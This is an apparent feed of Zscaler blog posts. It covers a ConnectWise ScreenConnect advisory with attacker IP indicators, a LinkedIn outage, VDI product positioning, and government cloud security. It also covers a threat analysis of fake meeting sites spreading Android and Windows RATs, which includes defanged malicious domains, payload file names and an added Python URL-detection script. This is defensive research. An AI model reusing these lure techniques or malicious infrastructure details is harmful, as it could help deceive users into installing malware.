- Route all server traffic through Zscaler Private Access™ with the application security module enabled and Zscaler Internet Access™, which provides visibility to identify and stop malicious activity from compromised systems/servers.
- Turn on Zscaler Advanced Threat Protection™ to block all known command-and-control (C2) domains, thereby adding another layer of protection if an attacker exploits this vulnerability to implant malware.
- Extend command-and-control (C2) protection to all ports and protocols with Zscaler Cloud Firewall™ (Cloud IPS module), including emerging C2 destinations. Doing so provides additional protection if the attacker exploits this vulnerability to implant malware.
- Use Zscaler Cloud Sandbox™ to prevent unknown malware delivered as part of a second-stage payload.
- Inspect all TLS/SSL traffic and restrict traffic to critical infrastructure from an allowed list of known-good destinations.

Conclusion

To ensure security, ConnectWise ScreenConnect users should update their on-prem deployments to version 23.9.8 or above promptly. Cloud-based deployments, on the other hand, do not require any action as ConnectWise has already applied the necessary patches. Failing to update exposes systems to vulnerabilities such as CVE-2024-1709 and CVE-2024-1708. These vulnerabilities enable threat actors to manipulate server configurations, gain administrator-level privileges, and execute remote code.
Indicators of Compromise

ConnectWise reported active exploitation of CVE-2024-1709 and released the following Indicators of Compromise (IOCs):
155[.]133[.]5[.]15
155[.]133[.]5[.]14
118[.]69[.]65[.]60

Zscaler Coverage

The Zscaler ThreatLabz team has deployed the following:

Zscaler Advanced Threat Protection
APP.EXPLOIT.CVE-2024-1708_CVE-2024-1709

Zscaler Private Access AppProtection
6000760 - ConnectWise ScreenConnect SetupModule Authentication Bypass (CVE-2024-1709)

For more details, visit the Zscaler Threat Library.

Mon, 11 Mar 2024 14:30:19 -0700 Arkaprava Tripathi https://www.zscaler.com/blogs/security-research/multiple-vulnerabilities-found-connectwise-screenconnect

LinkedIn Outage Detected by Zscaler Digital Experience (ZDX)
https://www.zscaler.com/blogs/product-insights/linkedin-outage-detected-zscaler-digital-experience-zdx

At 3:40 p.m. EST on March 6, 2024, Zscaler Digital Experience (ZDX) saw a substantial, unexpected drop in the ZDX score for LinkedIn services around the globe. Upon analysis, we noticed HTTP 503 errors highlighting a LinkedIn outage, with the ZDX heatmap clearly detailing the impact at a global scale.

ZDX dashboard indicating widespread LinkedIn outage

ZDX enables customers to proactively identify and quickly isolate service issues, giving IT teams confidence in the root cause, reducing mean time to resolve (MTTR) and first response time (MTTD).
ZDX dashboard showing LinkedIn global issues

ZDX Score highlights LinkedIn outage

Visible on the ZDX admin portal dashboard, the ZDX Score represents all users in an organization across all applications, locations, and cities on a scale of 0 to 100, with the low end indicating a poor user experience. Depending on the time period and filters selected in the dashboard, the score will adjust accordingly. The dashboard shows that the ZDX Score for the LinkedIn probes dropped to ZERO during the outage window of approximately 1 hour. From within ZDX, service desk teams can easily see that the service degradation isn’t limited to a single location or user and quickly begin analyzing the root cause.

ZDX Score indicating LinkedIn outage and recovery (times in EST)

Also in the ZDX dashboard, “Web Probe Metrics” highlight the user impact of reaching LinkedIn applications across a timeline with response times. In this case, the server responded with 503 errors, indicating the server was not ready to handle requests.

ZDX Web Probe Metrics indicating 503 errors (times in EST)

ZDX can quickly identify the root cause of user experience issues with its new AI-powered root cause analysis capability. This spares IT teams the labor of sifting through fragmented data and troubleshooting, thereby accelerating resolution and keeping employees productive. With a simple click in the ZDX dashboard, you can analyze a score, and ZDX will provide insight into potential issues. As you can see, in the case of this LinkedIn outage, ZDX highlights that the application is impacted while the network itself is fine.

ZDX AI-powered root cause analysis indicates the reason for the outage

When there’s an application outage, many IT teams turn to the network as the root cause. However, as you can see above, ZDX AI-powered root cause analysis verified that the network transport wasn’t the issue; it was actually at the application level.
You can verify this by looking at the CloudPath metrics from the user to the destination.

ZDX CloudPath showing full end-to-end data path

ZDX CloudPath detailed hops between the nodes

With AI-powered analysis and dynamic alerts, IT teams can quickly compare optimal vs. degraded user experiences and set intelligent alerts based on deviations in observed metrics. ZDX allows you to compare two points in time to understand the differences between them. This function determines a good vs. poor user experience, visually highlighting the differences between application, network, and device metrics. The end user comparison during the LinkedIn outage vs. a known good score indicates the ZDX Score difference, highlighting the unexpected performance drop for the end user.

ZDX comparison mode identifies the change in user experience

According to the LinkedIn status page, the outage was reported at 12:50 PST until 14:05 PST, which correlates to the ZDX data above. However, LinkedIn services started to recover pretty quickly, by 13:40 PST, and LinkedIn reported the issue resolved by 14:05 PST.

Source: LinkedIn

With ZDX alerting, our customers were proactively notified about end user problems, and incidents were opened automatically with our service desk integration (e.g., ServiceNow) long before users started to report it. From a single dashboard, customers were able to quickly identify this as a LinkedIn issue, not an internal network outage, saving precious IT time.

Zscaler Digital Experience successfully detected a LinkedIn outage along with its root cause, giving our customers the confidence that it was not a single location, their networks, or devices, averting critical impact to their business.

Try Zscaler Digital Experience today

ZDX helps IT teams monitor digital experiences from the end user perspective to optimize performance and rapidly fix offending application, network, and device issues. To see how ZDX can help your organization, please contact us.
Thu, 07 Mar 2024 19:14:07 -0800 Rohit Goyal https://www.zscaler.com/blogs/product-insights/linkedin-outage-detected-zscaler-digital-experience-zdx

From VDI replacement to complementary use: Part 2
https://www.zscaler.com/blogs/product-insights/positioning-zscaler-private-access-relative-to-vdi-part-2

In the first part of this VDI blog series, we discussed the two major use cases of access granularity and traffic inspection and how Zscaler can support these with the help of the Zero Trust Exchange platform. In this blog, we will focus on more use cases and ways to integrate Zscaler as a complementary solution to VDI to cover security-related aspects.

Data residency restriction

This use case deserves a deeper investigation, because although we can say that it is supported, there could be specific instances in which Zscaler cannot replace the VDI environment.

Zscaler Cloud Browser Isolation (CBI) prevents data from leaving the corporate boundary. We can define what level of restriction applies to the data exchange between the actual application and the isolated container. The recent introduction of Endpoint DLP capabilities could further help our conversation when stricter security requirements are required.

Zscaler Cloud Browser Isolation is inherently non-persistent; the virtual machine is terminated after each session. Now, imagine the scenario of a developer working remotely on a virtual desktop where he has his own environment and data can’t leave the company area. This individual would need a persistent desktop to work, and the user environment shouldn’t be destroyed when he closes the working session. This use case could be challenging for a VDI replacement; it could instead be addressed by leveraging Private Remote Access (PRA) and RDP.
In the above example, an RDP session could be launched toward a machine where the developer can log in and work, where their development environment sits, where communication is local, and where data won't leave the company boundary. Obviously, the organisation’s environment must be assessed carefully to validate the pros and cons of the proposed alternative.
Traffic localization
In this scenario, the goal is to keep the communication local to the data centre for performance reasons. From a Zscaler point of view, a potential replacement exists once we have validated with the customer the possibility of leveraging Private Remote Access (PRA) and RDP, where a remote session is launched toward a machine that interacts locally with the server.
Desktop or software license management / reduction
Discussing this scenario, under the assumption that the VDI environment is kept up and running, needs a preamble. ZCC does not support multiple, simultaneous user sessions from a single host operating system. The main problem to address is supporting ZIA and ZPA services on multi-user VDI environments. Zscaler now offers the ability to inspect all ports and protocols for multi-session, non-persistent VDI deployments in the public cloud and in on-prem data centers through the use of a VDI agent. Enterprises can apply granular threat and data protection policies per individual user session, enabling them to maintain common security policies across all environments. Multi-user VDI can be hosted on a public cloud (Azure, AWS, etc.) or in private data centers (VMware or KVM, etc.). Cloud/Branch Connector can be used to direct traffic from the VDI users to the Zscaler cloud and extend ZIA and ZPA services to the VDI users. However, Cloud/Branch Connector has no user/VM context for the traffic and will enforce a single security policy for all the VDI users.
To fix this issue, we leverage a VDI agent, which is a lightweight software package running in the user space of the VDI session. It is responsible for authenticating users, establishing a tunnel to the Branch or Cloud Connector (control and data), and exchanging user context with the Branch or Cloud Connector (see the diagram below). The VDI Agent maintains proprietary, lightweight tunnels (UDP encapsulation) to the local Cloud or Branch Connector. These tunnels carry both user session data in the payload and user context information in the UDP header. These tunnels are stateless, which ensures that, in the event of a Branch or Cloud Connector failure, they can fail over to other active appliances. With that said, we now have the possibility to extend Zscaler services to multi-user VDI environments.
Legacy app support
Although this scenario is becoming more and more niche due to application and architecture evolution, it is an area where VDI could help customers. The Zscaler Client Connector supports the latest software version and the two previous versions for each software product. See more details on the Zscaler Help page.
At a higher level, digging into why organisations use VDI in the first place is important. Walking through their use cases and applications to explore the scope is important to move customers beyond the assumptions that flow from the on-premises/on-network mindset. In some cases, Zscaler can be integrated in the existing environment to simply provide the appropriate level of security. There are two main aspects to consider. First, most applications are now web-based and could be securely made available to users regardless of VDI. Even if VDI is not replaced for all users, there are multiple reasons to integrate with ZIA/ZPA. Just think about users like financial advisors and insurance agents. Many firms have moved to web-based apps, DocuSign, etc. There may no longer be a hard requirement for those thousands of users to have VDI.
This requires going beyond what the network team may see, and engaging architects, app owners, etc. If we focus on the second aspect, rather than replacing the VDI infrastructure, another approach is to complement it. If we think about those use cases, organisations could still have security concerns around the user’s connectivity to the VDI environment (e.g. VMware Knowledge Base). In these scenarios, ZPA could protect that user traffic: it can secure access “to” the VDI environment and access “from” the VDI environment, as shown in the diagram below. The protection of traffic aimed at Internet/SaaS is addressed by ZIA services.
Connectivity to the VDI environment: Organisations may either put the VDI on the edge with its own DMZ infrastructure (firewall, security gateway, load balancer, etc.) and have users connect directly, or leverage a VPN-like technology to put the user on the network to access the VDI. ZPA, with Client Connector, enables a customer to either replace their internet-facing components or replace the VPN that is putting users onto the network.
Connectivity from the VDI environment: Organisations want to further segment what users have access to from their trusted device. ZPA with Client Connector can assist with setting up granular access on an application level.
Complete alternative to VDI: Organisations can leverage alternatives to VDI such as Zscaler Browser Isolation to replace their traditional VDI architecture. The benefits remain the same: if a user has an enterprise-managed browser that is isolated from the endpoint, the organisation’s admin remains in control of what can be egressed. A benefit of such an approach is the significantly lower overhead of managing such a capability.
The Zscaler Client Connector can be installed on the user’s device along with the VDI client, and ZPA carries the VDI traffic as a private application.
Another option is installing ZCC on the virtual desktop instance (Citrix XenDesktop, Azure WVD, Amazon WorkSpaces) to control what the user has access to internally. Existing customers are deploying this model with WVD and Amazon WorkSpaces using ZCC for both ZIA and ZPA. Benefits in such a scenario are centralized visibility and control and a single access control policy configuration for VDI and other forms of access, creating a consistent user experience. Finally, a hybrid approach is feasible. In this case, organisations want to offer direct ZPA access to employees but VDI-only access to third parties, and want to extend ZPA’s centralized visibility and control to VDI users accessing private applications. All these examples show that there are multiple ways to either completely replace or complement the existing VDI installation.
Fri, 08 Mar 2024 00:59:22 -0800 Stefano Alei https://www.zscaler.com/blogs/product-insights/positioning-zscaler-private-access-relative-to-vdi-part-2
Android and Windows RATs Distributed Via Online Meeting Lures https://www.zscaler.com/blogs/security-research/android-and-windows-rats-distributed-online-meeting-lures
Introduction
Beginning in December 2023, Zscaler’s ThreatLabz discovered a threat actor creating fraudulent Skype, Google Meet, and Zoom websites to spread malware. The threat actor spreads SpyNote RAT to Android users and NjRAT and DCRat to Windows users. This article describes and shows how the threat actor’s malicious URLs and files can be identified on these fraudulent online meeting websites.
Key Takeaways
- A threat actor is distributing multiple malware families using fake Skype, Zoom, and Google Meet websites.
- The threat actor is distributing Remote Access Trojans (RATs) including SpyNote RAT for Android platforms, and NjRAT and DCRat for Windows systems.
Campaign Overview
The attacker utilized shared web hosting, hosting all these fake online meeting sites on a single IP address.
All of the fake sites were in Russian, as shown in all the figures below. In addition, the attackers hosted these fake sites using URLs that closely resembled the actual websites.
Attack Sequence
The diagram below illustrates how the malware was distributed and executed on the victim's machine during the campaign:
Figure 1: Attack chain and execution flow for Android and Windows campaigns.
When a user visits one of the fake sites, clicking on the Android button initiates the download of a malicious APK file, while clicking on the Windows button triggers the download of a BAT file. The BAT file, when executed, performs additional actions, ultimately leading to the download of a RAT payload.
Skype
During our investigation, we discovered that the first fake site, join-skype[.]info, was created in early December to deceive users into downloading a fake Skype application, as shown in Figure 2.
Figure 2: The fraudulent Skype website, with a fake domain meant to resemble the legitimate Skype domain. (Image courtesy of urlscan.io.)
The Windows button pointed to a file named Skype8.exe and the Google Play button pointed at Skype.apk (neither of these files was available at the time of analysis). The Apple App Store button redirected to https://go.skype.com/skype.download.for.phone.iphone, indicating that the threat actor was not targeting iOS users with malware.
Google Meet
In late December, the attacker created another fake site, online-cloudmeeting[.]pro, mimicking Google Meet as shown in Figure 3. The fake Google Meet site was hosted on online-cloudmeeting[.]pro/gry-ucdu-fhc/, where the subpath gry-ucdu-fhc was deliberately created to resemble a Google Meet joining link. Genuine Google Meet invite codes typically follow the structure [a-z]{3}-[a-z]{4}-[a-z]{3}. The fake site provides links to download a fake Skype application for Android and/or Windows.
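The invite-code structure and lookalike hostnames described above are something a defender can check mechanically in URL logs or proxy telemetry. The following is an added example in Python, not code from the ThreatLabz post: it refangs an indicator, checks the host against a small allowlist of legitimate meeting domains (an assumption; a real deployment would maintain its own list), and flags paths that imitate a Google Meet invite code or a Zoom-style join path on a host that is not the real service. The sample URLs are the defanged domains quoted in this post plus constructed benign ones.

```python
from __future__ import annotations

import re
from urllib.parse import urlsplit

# Allowlist of legitimate meeting domains (assumption: a defender maintains their own list).
LEGIT_DOMAINS = ("meet.google.com", "zoom.us", "skype.com")
# Brand words that, in a host outside the allowlist, suggest a lookalike domain.
BRAND_WORDS = ("skype", "meet", "zoom")

# Google Meet invite codes look like xxx-xxxx-xxx (the pattern quoted in the article).
MEET_CODE_PATH = re.compile(r"^/[a-z]{3}-[a-z]{4}-[a-z]{3}/?$")
# Zoom-style join paths: real links use /j/<meeting id>; the fake site used /l/<long digits...>.
ZOOM_LIKE_PATH = re.compile(r"^/[jl]/\d{9,}")


def refang(url: str) -> str:
    """Turn a defanged indicator (hxxps, [.], [:]) back into a parseable URL."""
    return url.replace("hxxp", "http").replace("[.]", ".").replace("[:]", ":")


def _is_under(host: str, domain: str) -> bool:
    """True when host is the domain itself or a subdomain of it."""
    return host == domain or host.endswith("." + domain)


def classify_meeting_url(url: str) -> list[str]:
    """Return the reasons a URL looks like a meeting-app lure; an empty list means no finding."""
    parts = urlsplit(refang(url))
    host = (parts.hostname or "").lower()
    path = parts.path or "/"
    reasons: list[str] = []
    # Anything on a real meeting domain is out of scope for this heuristic.
    if any(_is_under(host, d) for d in LEGIT_DOMAINS):
        return reasons
    if any(word in host for word in BRAND_WORDS):
        reasons.append("brand_lookalike_host")
    if MEET_CODE_PATH.match(path):
        reasons.append("meet_invite_code_path_on_foreign_host")
    if ZOOM_LIKE_PATH.match(path):
        reasons.append("zoom_join_like_path_on_foreign_host")
    return reasons


def triage(urls: list[str]) -> dict[str, list[str]]:
    """Map each URL to its findings, keeping only URLs that produced at least one."""
    return {u: r for u in urls if (r := classify_meeting_url(u))}


# Constructed sample set: the defanged indicators from the post plus benign control URLs.
SAMPLE_URLS = [
    "hxxps://join-skype[.]info/",
    "hxxps://online-cloudmeeting[.]pro/gry-ucdu-fhc/",
    "hxxps://us06webzoomus[.]pro/l/62202342233720Yzhkb3dHQXczZG1XS1Z3Sk9kenpkZz09/",
    "https://meet.google.com/gry-ucdu-fhc",
    "https://us06web.zoom.us/j/1234567890",
    "https://go.skype.com/skype.download.for.phone.iphone",
]

if __name__ == "__main__":
    for url, reasons in triage(SAMPLE_URLS).items():
        print(url, "->", ", ".join(reasons))
```

The allowlist check runs first so that real invite links never trip the path heuristics; the path patterns only matter once the host is already foreign, which keeps the rule's false-positive surface small.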
The Windows link leads to a BAT file named updateZoom20243001bit.bat, which in turn downloads the final payload named ZoomDirectUpdate.exe. This final payload is a WinRAR archive file that contains DCRat, packed with Eziriz .NET Reactor.
Figure 3: The fake Google Meet page, showing the fraudulent domain in the address bar for a fake Google Meet Windows application link to a malicious BAT file that downloads and executes malware.
The Android link in this figure led to a SpyNote RAT APK file named meet.apk.
Zoom
In late January, we observed the emergence of a fake Zoom site (shown in Figure 4), us06webzoomus[.]pro. The fake Zoom site, hosted at the URL us06webzoomus[.]pro/l/62202342233720Yzhkb3dHQXczZG1XS1Z3Sk9kenpkZz09/, features a subpath that closely resembles a meeting ID generated by the Zoom client. If a user clicks the Google Play link, a file named Zoom02.apk will be downloaded containing the SpyNote RAT. Similar to the fake Google Meet site, when a user clicks the Windows button it downloads a BAT file, which in turn downloads a DCRat payload.
Figure 4: The fake Zoom page, showing a domain similar to the real Zoom domain in the address bar and a link to the malicious APK file that contains SpyNote RAT when the Google Play button is clicked.
Open Directories
In addition to hosting DCRat, the fake Google Meet and Zoom websites also contain an open directory (shown in Figure 5) with two additional Windows executable files named driver.exe and meet.exe (inside the archive gry-ucdu-fhc.zip), which are NjRAT. The presence of these files suggests that the attacker may utilize them in other campaigns, given their distinct names.
Figure 5: Example of additional malicious files hosted on the websites hosting fake online meeting applications.
Conclusion
Our research demonstrates that businesses may be subject to threats that impersonate online meeting applications.
In this example, a threat actor is using these lures to distribute RATs for Android and Windows, which can steal confidential information, log keystrokes, and steal files. Our findings highlight the need for robust security measures to protect against advanced and evolving malware threats and the importance of regular updates and security patches. As cyber threats continue to evolve and become increasingly complex, it is critical to remain alert and take proactive measures to protect against them. Zscaler's ThreatLabz team is dedicated to staying on top of these threats and sharing our findings with the wider community.
Zscaler Sandbox Coverage
During our investigation of this campaign, the Zscaler sandbox played a vital role in analyzing the behavior of different files. The sandbox analysis allowed us to identify threat scores and pinpoint specific MITRE ATT&CK techniques that were triggered during the analysis process.
Figure 6: DCRat Zscaler sandbox report
Figure 7: NjRAT Zscaler sandbox report
Zscaler’s multilayered cloud security platform detected payloads with the following threat names:
- Win32.Backdoor.DCRat
- Win32.Backdoor.NjRat
MITRE ATT&CK Techniques
Enterprise Matrix
TACTIC | TECHNIQUE ID | TECHNIQUE NAME
Execution | T1064 | Scripting
Execution | T1059.001 | PowerShell
Persistence | T1547.001 | Registry Run Keys / Startup Folder
Privilege Escalation | T1547 | Boot or Logon Autostart Execution
Defense Evasion | T1140 | Deobfuscate/Decode Files or Information
Defense Evasion | T1064 | Scripting
Defense Evasion | T1027 | Obfuscated Files or Information
Defense Evasion | T1027.002 | Software Packing
Defense Evasion | T1070.004 | File Deletion
Defense Evasion | T1036 | Masquerading
Credential Access | T1056 | Input Capture
Credential Access | T1555 | Credentials from Password Stores
Discovery | T1124 | System Time Discovery
Discovery | T1083 | File and Directory Discovery
Discovery | T1082 | System Information Discovery
Discovery | T1518.001 | Security Software Discovery
Discovery | T1057 | Process Discovery
Discovery | T1010 | Application Window Discovery
Discovery | T1018 | Remote System Discovery
Discovery | T1016 | System Network Configuration Discovery
Discovery | T1120 | Peripheral Device Discovery
Collection | T1123 | Audio Capture
Collection | T1115 | Clipboard Data
Collection | T1056 | Input Capture
Collection | T1113 | Screen Capture
Collection | T1125 | Video Capture
Command and Control | T1219 | Remote Access Software
Command and Control | T1573 | Encrypted Channel
Command and Control | T1571 | Non-Standard Port
Command and Control | T1095 | Non-Application Layer Protocol
Command and Control | T1071 | Application Layer Protocol
Impact | T1498 | Network Denial of Service
Impact | T1529 | System Shutdown/Reboot
Mobile Matrix
TACTIC | TECHNIQUE ID | TECHNIQUE NAME
Persistence | T1624 | Event Triggered Execution: Broadcast Receivers
Persistence | T1444 | Masquerade as Legitimate Application
Privilege Escalation, Persistence | T1626 | Abuse Elevation Control Mechanism
Privilege Escalation, Persistence | T1546 | Event Triggered Execution
Collection | T1533 | Data from Local System
Collection | T1429 | Audio Capture
Collection | T1430 | Location Tracking
Collection | T1636 | Contact and SMS data
Tue, 05 Mar 2024 08:30:01 -0800 Himanshu Sharma https://www.zscaler.com/blogs/security-research/android-and-windows-rats-distributed-online-meeting-lures
Positioning Zscaler Private Access Relative to VDI: Part 1 https://www.zscaler.com/blogs/product-insights/positioning-zscaler-private-access-relative-to-vdi-part-1
What are some of the most common concerns heard from customers about virtual desktop infrastructure (VDI)? They are often related to cost, complexity, management, upkeep, and security. How can Zscaler solve these challenges? VDI is an undoubtedly complex environment, and having a clear picture of the organization’s needs, and positioning the right solution to improve security, reduce complexity, and improve the user experience, is not always easy. Zscaler Private Access (ZPA) has evolved in the past few years and become a direct replacement of VDI, whether on-premises or cloud-delivered. It is, however, not yet possible to map all the use cases supported by a VDI implementation, and doing so is in general not a trivial task. Sometimes Zscaler can play a role by simply integrating solutions and providing the right level of security. To be able to understand which role ZPA can play to replace VDI, it is crucial to first understand why the customer is using a VDI.
Organisations leverage VDI for various reasons. The most common use cases are:
1. Access granularity – restrict users’ access to only authorized applications
2. Traffic inspection – VDI as a choke point to run all traffic through on-premises security stacks
3. Data residency restriction
   a) Ensure data stays within the corporate boundary and/or
   b) Ensure data is never stored on an end user's device
4. Traffic localization – minimize latency for heavyweight client-server interactions (e.g. database calls)
5. Desktop or software license management / reduction
   a) Clean desktop experience
   b) Persistent desktop that the user can access from multiple devices
   c) Software deployed to a limited pool of virtual desktops, rather than to all user devices
6. Legacy app support – enable access to apps that require an older OS
VDIs are expensive, cumbersome to manage, and often hinder user experience. But there is much more to think about: we are witnessing profound changes in the EUC (End User Computing) market. Considering most applications are now web-based, you could potentially replace a VDI with isolated browser access and provide secure access to these web applications. Applications requiring access via protocols such as SSH and RDP can be easily addressed using Zscaler Privileged Remote Access (PRA). However, organisations probably still need to depend on VDIs in certain scenarios, like if they have applications requiring thick clients. In this case, they would be able to significantly reduce the size of their VDI deployment by using browser isolation. Whenever Zscaler can’t replace VDI, it can still be integrated. Zscaler can secure Internet/SaaS access of VDI instances, and additionally can protect access to VDI infrastructure. Whenever there is a VDI environment, ZIA and ZPA capabilities can play a role and improve the environment.
Major use cases in detail
1. Access granularity
This use case is fully supported and can be deployed by leveraging multiple capabilities of the Zscaler Zero Trust Exchange platform, like Browser Isolation. It allows you to leverage a web browser for user authentication and application access over ZPA, without requiring users to install Zscaler Client Connector on their devices. In certain cases, it might not be feasible or desirable to install Client Connector on all devices. For example, you might want to provide third-party access to applications on devices that might not be owned or managed by your company (e.g., contractor or partner-owned devices) or control user access to applications on devices with operating systems that are not currently supported by Zscaler Client Connector. Browser Isolation (BI) enhances the ZPA experience by making applications accessible for users from any web browser without requiring Zscaler Client Connector or browser plugins and configurations. Additionally, the existing Identity Provider (IdP) can be used to provide access to current users, contractors, and other third-party users without managing an internet footprint. BI is a feature that addresses needs in both cyberthreat protection and data loss prevention and can be leveraged for both internet/SaaS apps and private apps. BI policies can dictate if a site should be run within isolation, and if so, whether you allow cut/paste and download capabilities for the user. An isolation container is instantiated for each user in the cloud and only pixels are transmitted to the user’s browser. Sites may be isolated due to a configured URL category, cloud app control policy, or suspicious destinations (if Smart Browser Isolation is enabled). Last, but not least, it is worthwhile to mention the recent capabilities introduced by User Portal 2.0, which allow unmanaged devices to access SaaS and private web apps.
With this feature enabled, unmanaged devices will be able to use the ZPA user portal to access sanctioned SaaS/private web apps and have their internet-facing traffic routed through ZIA while in Isolation mode. Organisations can provide access to sanctioned SaaS applications from unmanaged devices and enforce policies using the isolation policies defined on ZPA. The isolation containers that are created as a result of a ZPA Isolation Policy can forward non-ZPA-defined application traffic and generated internet traffic to ZIA for further processing and enforcement of the necessary policies. Any traffic generated for applications defined on ZPA will continue to be forwarded via ZPA’s ZTNA service.
2. Traffic inspection
Although this use case is rare, traffic inspection is still fully supported, leveraging the inspection capability provided by the Zero Trust Exchange platform. We can use Zscaler Private Access (ZPA) AppProtection (formerly Inspection), which provides high-performance, inline security inspection of the entire application payload to expose threats. It identifies and blocks known web security risks, such as the OWASP Top 10, and emerging zero-day vulnerabilities that can bypass traditional network security controls. It can help to protect internal applications from all types of attacks covered by the OWASP predefined controls, such as SQL injection, cross-site scripting (XSS), and more. Additionally, it helps to understand the severity, description, and recommended default action for each type of attack related to the OWASP predefined controls. Each OWASP predefined control is identified with a unique number, defining how the control operates, and is associated with a level of concern.
The predefined controls are organized into various categories:
- Preprocessors
- Environment and Port Scanners
- Protocol Issues
- Request Smuggling or Response Split or Header Injection
- Local File Inclusion
- Remote File Inclusion
- Remote Code Execution
- PHP Injection
- Cross-Site Scripting (XSS)
- SQL Injection
- Session Fixation
- Deserialization Issues
- Anomalies
Additionally, Zscaler recently introduced support for inspecting ZPA application segment traffic. A predefined forwarding rule, ZIA Inspected ZPA Apps, is available on the Policy > Forwarding Control page to inspect the Microtunnel traffic of a ZPA application segment using ZIA. This rule is applied automatically to the traffic from ZPA application segments with the Inspect Traffic with ZIA field enabled in the ZPA Admin Portal. As part of this feature, a predefined Auto ZPA Gateway is available on the Administration > Zscaler Private Access Gateway page. This new gateway is the default for the predefined ZIA Inspected ZPA Apps forwarding rule. We can minimize data exfiltration concerns with ZPA AppProtection by utilizing Cloud Browser Isolation (CBI), where unmanaged devices are prevented from downloading sensitive content to the local host. For corporately managed devices, organisations can leverage DLP with Source IP Anchoring (SIPA) utilizing the ZIA cloud. AppProtection customers can craft custom signatures to detect and block bulk data downloads and use those in conjunction with other validation methods such as ZPA posture control. Organisations can rely on Zscaler Internet Access (ZIA) SSL Inspection best practices for configuring and deploying it in an organization's network environment, for example while accessing SaaS applications. Encrypting communications helps maintain the privacy and security of information passed between sender and receiver.
Secure Sockets Layer (SSL) and its successor, Transport Layer Security (TLS), are protocols designed for the privacy and security of internet services. While these protocols do a great job of keeping information private from prying eyes, they also conceal threats to the user, device, and organization. This is where the inspection of SSL and TLS encrypted traffic becomes a necessity. Inspecting encrypted SSL and TLS traffic via SSL Inspection is done by the Zero Trust Exchange at scale, allowing organizations to control risk and enforce policy. Enabling SSL Inspection is a required first step towards:
- Controlling risk
- Inspecting traffic (malware, data loss)
- Adaptive control
- Enforcing policy
- Per-session policy decision and enforcement
- Allowing, blocking, and restricting tenant environments
Use cases 3 to 6 will be covered in part two of this series.
Fri, 01 Mar 2024 02:41:49 -0800 Stefano Alei https://www.zscaler.com/blogs/product-insights/positioning-zscaler-private-access-relative-to-vdi-part-1
Securing Government Workload Communications in the Public Cloud https://www.zscaler.com/blogs/product-insights/securing-government-workload-communications-public-cloud
As government agencies continue their journey towards digital transformation, many are embracing hybrid cloud deployments to modernize their operations. A transition to a public or private cloud brings new challenges, especially when it comes to securing workload communications. In this blog, we will delve into the reality of hybrid cloud deployments and explore how Zscaler's zero trust architecture provides a comprehensive solution for securing government workloads in the public cloud.
The Expanding Definition of Hybrid Cloud
Hybrid cloud deployments have become increasingly complex as agencies expand their infrastructure across multiple regions and clouds.
Rather than relying on a single cloud or region, agencies leverage different regional clouds to ensure availability and scalability. Additionally, within a specific region, agencies may need to consider availability zones to ensure business continuity. Figure 1 illustrates scenarios of hybrid cloud deployments.
Workload Communications in the Public Cloud
To illustrate the challenges of workload communications, let's consider the example of a Department of Motor Vehicles (DMV) application deployed in the AWS GovCloud. This application needs to interact with other workloads or applications, such as a CRM or ERP system in the data center, to access driver records. It may also need to communicate with scheduling applications in different regions or clouds, and even access vehicle registration information stored in a different cloud provider such as Azure. Additionally, the DMV application may require software updates and send logs to the Google Cloud Platform. Figure 2 shows
Legacy Architecture Challenges
Traditionally, agencies have extended their on-premises architecture to the cloud by deploying firewalls and VPNs. While this approach may provide initial security, it also amplifies lateral movement, increases cyberthreats, and exposes the infrastructure to data leaks. Moreover, deploying and managing multiple firewalls and VPNs across different cloud environments and regions adds complexity and operational costs.
Introducing Zscaler's Zero Trust Approach
Zscaler offers a cloud-delivered security platform based on zero trust principles to address the challenges faced by government agencies in securing workload communications. By adopting a zero trust proxy-based architecture, Zscaler eliminates the expanded attack surface and lateral movement risks associated with legacy architectures.
Connectivity and Security
Zscaler's platform provides both connectivity and security for workloads in the public cloud.
It ensures secure connectivity by allowing access only to specific URLs or APIs, preventing open access to the internet. Workload-to-workload communications are based on least privileged access, ensuring that each workload can only communicate with authorized resources. Before any connection is established, zero trust-based authentication and authorization checks are performed, further enhancing security.
Threat Prevention and Data Protection
Zscaler's platform offers comprehensive threat prevention and data protection capabilities. It provides URL filtering, intrusion prevention, DNS protection, and behavior analysis, all backed by AI and ML-based risk analysis. Inline data protection ensures that sensitive data does not leak from workloads, with features such as regex-based checks, exact data matching, OCR technology for file inspection, and AI/ML-based data classification.
TLS Decryption at Cloud Scale
With the increasing prevalence of encrypted traffic, TLS decryption at cloud scale becomes crucial. Zscaler's platform provides 100% inspection of traffic without compromising performance. This allows for effective threat prevention and data protection, ensuring the safety of data packets and preventing malicious intent.
Granular App-to-App Segmentation
Zscaler enables granular app-to-app segmentation, eliminating the need for expensive networking infrastructure or additional layers of segmentation software. This ensures that workloads can only access authorized resources, providing an additional layer of security.
The Common Platform Advantage
Zscaler's platform offers a common platform for securing workloads across multiple clouds. By installing lightweight cloud connectors in different clouds, agencies can benefit from standardized and consolidated security operations. This approach simplifies security management, reduces operational complexity and costs, and ensures consistent security policies across multiple clouds.
It stops external threats by protecting egress traffic from any malicious payload. It protects against insider threats by eliminating the threat of a bad actor within the agency who has the credentials to inflict harm, either by inserting a malicious payload or by trying to exfiltrate sensitive data. The Zero Trust Exchange is designed to eliminate lateral movement and reduce the attack surface significantly. Moreover, Zscaler's platform is both FedRAMP and StateRAMP Authorized and GovCloud ready.
For more information on Zscaler Workload Communications:
- Download the Datasheet
- Watch the Webinar: Ensuring Cloud Workload Security for Federal and State Government
- Request a Test Drive in AWS
Wed, 28 Feb 2024 05:05:01 -0800 Sakthi Chandra https://www.zscaler.com/blogs/product-insights/securing-government-workload-communications-public-cloud
European diplomats targeted by SPIKEDWINE with WINELOADER https://www.zscaler.com/blogs/security-research/european-diplomats-targeted-spikedwine-wineloader
Introduction
Zscaler's ThreatLabz discovered a suspicious PDF file uploaded to VirusTotal from Latvia on January 30th, 2024. This PDF file masquerades as an invitation letter from the Ambassador of India, inviting diplomats to a wine-tasting event in February 2024. The PDF also included a link to a fake questionnaire that redirects users to a malicious ZIP archive hosted on a compromised site, initiating the infection chain. Further threat hunting led us to the discovery of another similar PDF file uploaded to VirusTotal from Latvia in July 2023. This blog provides detailed information about a previously undocumented backdoor we named ‘WINELOADER’. We believe that a nation-state threat actor, interested in exploiting the geopolitical relations between India and diplomats in European nations, carried out this attack.
The attack is characterized by its very low volume and the advanced tactics, techniques, and procedures (TTPs) employed in the malware and command and control (C2) infrastructure. While we have not yet attributed this attack to any known APT group, we have named this threat actor SPIKEDWINE based on the wine-related theme and filenames used in different stages of the attack chain, and our investigation into the case is ongoing.
Key Takeaways
